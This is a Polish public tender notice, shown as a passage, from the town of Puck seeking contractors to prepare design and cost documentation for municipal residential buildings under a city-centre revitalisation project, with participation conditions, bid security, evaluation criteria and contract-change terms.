Otoczenie wielorodzinnych budynków mieszkalnych obejmować będzie m. in.: zagospodarowanie podwórek, drogi wewnętrzne i dojazdowe, chodniki, miejsca postojowe, ukształtowanie terenu, urządzenie i zakup zieleni, oświetlenie terenu, monitoring wizyjny oraz małą architekturę. 

Lokalizacja budynków: Załącznik nr 8 do SIWZ.
3.	Opracowanie i przedstawienie Zamawiającemu projektu koncepcyjnego oraz dokonanie prezentacji. Zaakceptowana przez Zamawiającego koncepcja będzie podstawą do sporządzenia projektu budowlanego. Termin sporządzenia koncepcji w terminie do             1 miesiąca od dnia podpisania umowy. Przedstawienie koncepcji w wersji papierowej           i elektronicznej. Zamawiający w terminie 14 dni od daty złożenia koncepcji przedstawi Wykonawcy ewentualne uwagi do opracowania (w razie konieczności Wykonawca dokona poprawek w terminie 14 dni). Powyższe będzie warunkiem podpisania protokołu odbioru przedmiotu zamówienia.  
4.	Opracowanie i przekazanie Zamawiającemu kompletnej dokumentacji projektowej (wielobranżowe projekty budowlane, wielobranżowe projekty wykonawcze ze  specyfikacjami technicznymi wykonania i odbioru robót budowlanych, przedmiarami, kosztorysami ofertowymi i kosztorysami inwestorskimi, sporządzenie informacji dotyczących bezpieczeństwa i ochrony zdrowia) i pozwoleniem na budowę. 
5.	Wykonanie wszelkich badań, pomiarów, inwentaryzacji, ekspertyz i uzgodnień niezbędnych dla wykonania przedmiotu umowy oraz prawidłowej realizacji zamówienia.
6.	Opracowanie dokumentacji projektowo-kosztorysowej: 
1)	w wersji papierowej powinno być trwale oprawione i zawierać oświadczenie, że jest wykonane zgodnie z umową, obowiązującymi przepisami oraz że jest wydane w stanie zupełnym ze względu na cel oznaczony w umowie. 
2)	dokumentacja koncepcyjna  1 egzemplarz + wersja elektroniczna na nośniku CD lub DVD z zapisem elektronicznym części opisowej i rysunkowej dokumentacji,
3)	kompletną dokumentację należy przekazać w formie papierowej w teczkach z opisem w języku polskim w ilości:
a)	wielobranżowe projekty budowlane w 8 egzemplarzach,
b)	wielobranżowe projekty wykonawcze w 8 egzemplarzach,
c)	STWiOR w 2 egzemplarzach,
d)	przedmiary, kosztorysy ofertowe, kosztorysy inwestorskie w 3 egzemplarzach,
e)	pozwolenie na budowę w 1 egzemplarzu.
4)	pokwitowanie przyjęcia dokumentacji przez Zamawiającego ma tylko taki skutek, że potwierdza datę jej złożenia Zamawiającemu, a w szczególności nie stanowi potwierdzenia jej przyjęcia bez zastrzeżeń,
5)	Wersja cyfrowa na nośnikach elektronicznych w ilości 3 w formacie źródłowym (*.doc, *.xls, *.dwg) oraz rysunki dodatkowo w formacie PDF. 
a) rysunki winny być zapisane w formacie *,dwg  i *.pdf,
b) specyfikacje  techniczne  mają  być  zapisane w formatach  *.doc lub *odt  i *.pdf,
c) kosztorysy inwestorskie i przedmiary  robót  mają  być zapisane w formatach *.ath  i  *.pdf,
d) wszystkie dokumenty uzgadniające, decyzje, opinie itd. mają być zeskanowane
 i załączone do dokumentacji przekazywanej na nośniku CD lub DVD
w formacie  *.pdf  lub *.jpg.
7.	Dokumentacja projektowo-kosztorysowa będzie stanowić podstawę do wyłonienia wykonawcy robót budowlanych i powinna zostać opracowana w sposób umożliwiający dokonanie opisu przedmiotu zamówienia na roboty budowlane zgodnie z zapisem art. 29, 30 i 31 ustawy Pzp. oraz uzyskanie potrzebnych pozwoleń formalno-prawnych.
8.	Zamawiający zastrzega, że wszędzie tam, gdzie w treści dokumentów składających się na opis przedmiotu zamówienia i w samym opisie zostały wskazane znaki towarowe, patenty, pochodzenie lub normy, Zamawiający dopuszcza metody, materiały, urządzenia, systemy, technologie, produkty, itp. równoważne do  przedstawionych w opisie przedmiotu zamówienia.
Zamawiający do wszystkich nazw, znaków towarowych, patentów lub pochodzenia wskazanych w opisie przedmiotu zamówienia dopisuje wyrazy lub równoważny.
Cel opracowań projektowych: wykonana dokumentacja projektowo-kosztorysowa winna umożliwić Zamawiającemu aplikację o środki z REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA POMORSKIEGO NA LATA 2014-2020 OŚ PRIORYTETOWA 8 KONWERSJA DZIAŁANIE 08.01. Kompleksowe przedsięwzięcia rewitalizacyjne - wsparcie dotacyjne PODDZIAŁANIE 08.01.01. Kompleksowe przedsięwzięcia rewitalizacyjne w miastach Obszaru Metropolitalnego Trójmiasta - mechanizm ZIT i uzyskanie wymaganych pozwoleń formalno-prawnych. 








<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><b> Dodatkowe kody CPV:</b>71248000-8,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług zamówienia polegającego na powtórzeniu podobnych usług, jeżeli takie zamówienie było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 150<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zadanie 1:
a)	zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże,   
	że zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej jedno zamówienie (potwierdzone dowodami określającymi czy ta usługa została wykonana należycie) polegające na opracowaniu 1 wielobranżowej dokumentacji projektowo-kosztorysowej dot. budowy, remontu, modernizacji obiektu  budowlanego użyteczności publicznej lub mieszkalnego wielorodzinnego                o powierzchni użytkowej nie mniejszej niż 400 m dla której wymagane było uzyskanie decyzji pozwolenia na budowę,
	że dysponuje:
	jedną osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, 
	jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
	jedną osobą posiadającą uprawnienia do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 
	jedną osobą posiadającą uprawnienia do projektowania w specjalności telekomunikacyjnej bez ograniczeń.
    Zadanie 2:  
a)	   zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże,   
	że zrealizował w okresie ostatnich 3 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej jedno zamówienie (potwierdzone dowodami określającymi czy ta usługa została wykonana należycie) polegające na opracowaniu 1 wielobranżowej dokumentacji projektowo-kosztorysowej dot. budowy, remontu, modernizacji obiektu  budowlanego użyteczności publicznej lub mieszkalnego wielorodzinnego                o powierzchni użytkowej nie mniejszej niż 400 m dla której wymagane było uzyskanie decyzji pozwolenia na budowę,
	że dysponuje:
	jedną osobą posiadającą uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, 
	jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,
	jedną osobą posiadającą uprawnienia do projektowania w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, 
	jedną osobą posiadającą uprawnienia do projektowania w specjalności telekomunikacyjnej bez ograniczeń.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	Do oferty każdy wykonawca musi dołączyć aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załączniku nr 3 do SIWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług,wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wraz z oświadczeniem na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy,
b)	wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi  były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.  
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Wykonawca zobowiązany jest wnieść wadium w wysokości:
Zadanie 1: 1.000,00 PLN (słownie: jeden tysiąc złotych 00/100) 
Zadanie 2: 500,00 PLN (słownie: pięćset złotych 00/100)  
przed upływem terminu składania ofert.
2.	Wadium może być wniesione w:
1)	pieniądzu;
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016 r. poz. 359). Wadium wnoszone w formie gwarancji lub poręczeń musi być złożone w oryginale przed upływem terminu składania ofert w Referacie Finansowo-Budżetowym Urzędu Miasta w Pucku, 84-100 Puck, ul. 1 Maja 13, pokój nr 214. Gwarancje bankowe, ubezpieczeniowe lub poręczenia winny posiadać ważność od dnia otwarcia ofert. Wadium, niezależnie od formy wniesienia, podlega prawu polskiemu. Wykonawcy - wnosząc wadium - powinni zawsze podawać numer sprawy (przetargu) oraz nazwę zamówienia.
3.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Millennium     S. A.  nr rachunku 22 1160 2202 0000 0001 6285 3611, z dopiskiem na przelewie: Wadium w postępowaniu RGKiM.271.6.2017.WK na Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacjai projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę. Zadanie 1, zadanie 2.  
4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa w rozdz. VIII. 3 niniejszej SIWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
5.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy PZP.
6.	Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.
7.	Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP.

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń:
1)	wystąpienia zamian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
2)	wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony,
3)	wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustanie stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) przy pomocy których Wykonawca realizuje przedmiot umowy. Zmiana jest możliwa pod warunkiem zaproponowania innych osób spełniających na dzień składania ofert warunki określone w SIWZ,
4)	zmiany podwykonawcy, który zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych będzie podmiotem udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku Wykonawca jest zobowiązany zaproponować innego podwykonawcę  spełniającego warunki określone przez Zamawiającego wraz załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w SIWZ,
5)	zmiany terminów realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, w szczególności:
a)	jeżeli będą następstwem: polecenia przez Zamawiającego dokonania zmian w uzgodnionych wcześniej rozwiązaniach projektowych.
b) jeżeli będą następstwem działań organów administracji państwowej lub       samorządowej:
        - przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, itp.,
        - odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień, itp.
	6) wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami:
	a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze                         szczegółowym opisem,
	b) zmiana danych związanych ze zmianami administracyjno-organizacyjno-prawnymi umowy (np. zmiana nr rachunku bankowego),
	c) zmiana danych teleadresowych,
	d) rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. 
7) Wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności, w tym wystąpienia opóźnień niezależnych od Wykonawcy i Zamawiającego,
8) wystąpienia konieczności wprowadzenia zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy.
2.	W przypadku wystąpienia któregokolwiek ze zdarzeń  wymienionych w pkt 1.6) niniejszej umowy termin realizacji przedmiotu umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
3. Wszelkie zmiany do niniejszej umowy wymagają pisemnego aneksu podpisanego przez strony.
4. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
5.	W trakcie trwania niniejszej umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o:
1)	ogłoszeniu upadłości,
2)	ogłoszeniu likwidacji,
3)	zmianie siedziby lub nazwy firmy,
4)	zmianie osób reprezentujących,
5)	zawieszenia działalności,
6)	wszczęciu postępowania układowego, w którym uczestniczy Wykonawca.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/03/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przygotowanie dokumentacji projektowo-kosztorysowej budynków komunalnych w celu realizacji projektu pn.: Rewitalizacja Centrum Pucka wraz z uzyskaniem niezbędnych uzgodnień i pozwolenia na budowę Zadanie 1: ul. 10-go Lutego 27, ul. generała Józefa Hallera 5, ul. generała Józefa Hallera 7,         ul. generała Józefa Hallera 7A, ul. generała Józefa Hallera 13, ul. Sambora 4 <br /><div style="padding-left: 20px"><b>
